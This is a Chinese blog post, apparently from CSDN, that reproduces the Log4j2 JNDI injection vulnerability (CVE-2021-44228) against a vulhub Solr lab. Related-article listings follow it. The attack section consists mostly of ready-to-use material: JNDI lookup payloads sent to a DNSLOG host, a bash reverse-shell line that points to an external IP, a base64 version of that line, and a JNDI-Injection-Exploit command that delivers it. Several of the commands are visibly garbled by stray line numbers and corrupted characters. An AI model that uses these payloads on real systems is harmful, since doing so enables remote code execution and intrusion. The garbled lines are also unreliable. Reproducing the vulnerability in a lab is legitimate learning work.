log4j2漏洞复现

已于 2024-07-31 22:10:15 修改
阅读量148 收藏
点赞数 2
文章标签: log4j
于 2024-07-31 21:33:03 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_71053667/article/details/140830779
版权

》》》漏洞复现《《《
步骤一:执行以下命令启动靶场环境并在浏览器访问

启动命令#
systemctl start docker
cd vulhub/log4j/CVE-2021-44228
4docker-compose up -d
# 访问网址
http://192.168.3.42:8983/solr/#/6

步骤二:先在自己搭建的DNSLOG平台上获取一个域名来监控我们注入的效果.

步骤三:可以发现 /solr/admin/cores?action= 这里有个参数可以传,可以按照上面的原理先构造一个请求传过去存在JNDI注入那么Idap服务端会执行我们传上去的payload然后在DNSLOG平台上那里留下记录,我们可以看到留下了访问记录并且前面的参数被执行后给我们回显了java的版本号

/solr/admin/cores?action=${jndi:ldap://${sys:java.version}.r2rrt.l0gs.4ptsonline}
2/solr/admin/cores?action=${jndi:ldap://${sys:java.version}.6iyj3.l0gs.4ptsonline:9999/aaa}
${jndi:ldap://${sys:java.version}.wpazw.l0gs.4pts.online:9999/aaa}

步骤四:开始反弹Shel准备 JNDI-Injection-Exploit 下载地址并构造PayLoad如下...启动!

#JDNI项目地址
https://github.com/welk1n/JNDI-Injection-Exploit/releases/tag/v1.0
4#反弹shell
bash -i>& /dev/tcp/101.42.118.221/8080 0>&1
#反弹Shell-base64加密
YmFzaCAtaSA+JiAVZGV2L3RjCC8XMDEUNDIUMTE4LjIyMS84MDgWIDA+JjE=
10# 命令模板
11java -jar target/INDI-Injection-Exploit-1.0-SNAPSH0T-all.jar -C"bash -c{echo,[经过base64编码后的命令1}|{base64,-d}|bash"-A「你的ypsipl
12
13、#最终Payload
14java -jar JNDI-Injection-Exploit-1.0-SNAPSH0T-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAVZGV2L3RjCC8xMDEUNDIUMTE4LjIyMS84MDgWIDA+JjE=}|{base64,-d} |bash"-A 101.42.118.221
15
16# 备注
I)-C后面的参数是要执行的命令以及编码方式,-A后面就是对应ip地址,

监听不到端口,监听到后更新

发生什么事了318
关注
log4j漏洞原理和靶场复现
Aiwin的博客
08-19 8055
log4j漏洞原理和靶场复现
一次Log4j2漏洞复现过程
weixin_60830484的博客
04-17 412
本次将复现著名的Log4j2远程代码执行漏洞(CVE-2021-44228)
Log4j复现过程
weixin_50339832的博客
12-26 2406
log4j是一个记录日志的组件,用来对程序状态进行动态记录, logger.info("system propety: ${jndi:schema://url}"); jndi:jndi解析器通过jdk获取内容,反序列化为java对象作为jndi, 并打印,jndi就是这个从外部查找得到的java对象。 schema:获取方式,jdk支持多种不同的查找方式,包括 corbname, dns, iiop, iiopname, ldap, ldaps, rmi 因ldap写法简单,被作为常用的获取方式
Log4j漏洞复现
m1287578441的博客
06-08 2970
Log4j漏洞复现
2021-12-10 log4j2 漏洞复现
qq_35745341的博客
12-10 4497
log4j2 漏洞复现 https://github.com/welk1n/JNDI-Injection-Exploit 1、运行该github项目(用idea运行ServerStart的main方法或运行jar包,jar包上面github地址有提供) 注意windows与mac的不同 ,jdk1.8及以下 运行jar包命令: java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "C:\Windows\System32\calc.exe" -A
Apache Log4j2漏洞复现
qq_62056583的博客
07-20 814
复现并分析【CVE-2021044228】Apache Log4j2 Server 反序列化命令执行漏洞,使用docker技术搭建漏洞环境,在实验环境中复现漏洞
Log4j2漏洞复现
热门推荐
weixin_51519028的博客
08-12 1万+
Apache Log4j2是 Apache软件基金会下的一个开源的基于 Java 的日志记录工具。Log4j2 是一个 Log4j 1.x 的重写,并且引入了大量丰富的特性。该日志框架被大量用于业务系统开发,用来记录日志信息。由于其优异的性能而被广泛的应用于各种常见的 Web 服务中。2021 年 12 月 9 日晚,Log4j2 的一个远程代码执行漏洞的利用细节被公开。攻击者使用${}......
log4j2漏洞复现(CVE-2021-44228)
人们并不感谢罗辑
08-16 2033
log4j2是一个记录日志的日志记录框架,他存在漏洞的原因是因为反序列化导致的远程代码执行(rce)。在日志记录的过程中使用了JNDI接口,这个接口调用了lookup方法,可以远程加载java对象。如果没有对这个方法进行限制,攻击者可以构造恶意代码,从而使得服务器被getshell
安全漏洞Log4j2漏洞复现绕过分析
AzulSystems的博客
03-04 226
Log4j2是Java开发常用的日志框架,该漏洞触发条件低,危害大,由阿里云安全团队报告分配CVE编号:CVE-2021-44228CVSS评分:10.0(最高只能10分)POC比较简单POC虽然简单,但是搭建LDAP环境显得有点复杂,marshalsec方式需要自行编译class并搭建HTTP服务端java -jar LDAPKit.jar [命令]截图如下【一>所有资源获取
5.错误处理在存储过程中的重要性(5/10)
小相探索IT世界
10-09 1295
错误处理在存储过程中指的是一系列机制和策略,用于识别、响应和恢复在执行存储过程时可能发生的异常或错误。异常捕获:识别存储过程中发生的特定错误或异常。错误记录:将错误信息记录到日志中,以便于后续分析和调试。用户通知:向调用者或用户报告错误信息。事务管理:确保数据的完整性,例如,在发生错误时回滚事务。恢复操作:在可能的情况下,采取措施恢复到错误发生前的状态。在复杂的应用程序中,考虑使用自定义错误条件来处理特定的错误场景。这可以提高代码的可读性和可维护性。
numexpr-2.8.3-cp38-cp38-win_amd64.whl
10-14
numexpr-2.8.3-cp38-cp38-win_amd64.whl
ujson-5.3.0-cp311-cp311-win_amd64.whl
10-14
ujson-5.3.0-cp311-cp311-win_amd64.whl
基于MATLAB车牌识别程序技术实现面板GUI.zip
最新发布
10-14
vos3000
apache log4j2 漏洞复现
06-28
Apache Log4j2漏洞是一种远程代码执行漏洞,攻击者可以利用该漏洞在受影响的服务器上执行任意代码。攻击者可以通过构造特定的请求,将恶意代码注入到受影响的服务器上,从而实现远程代码执行。该漏洞已被广泛利用,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值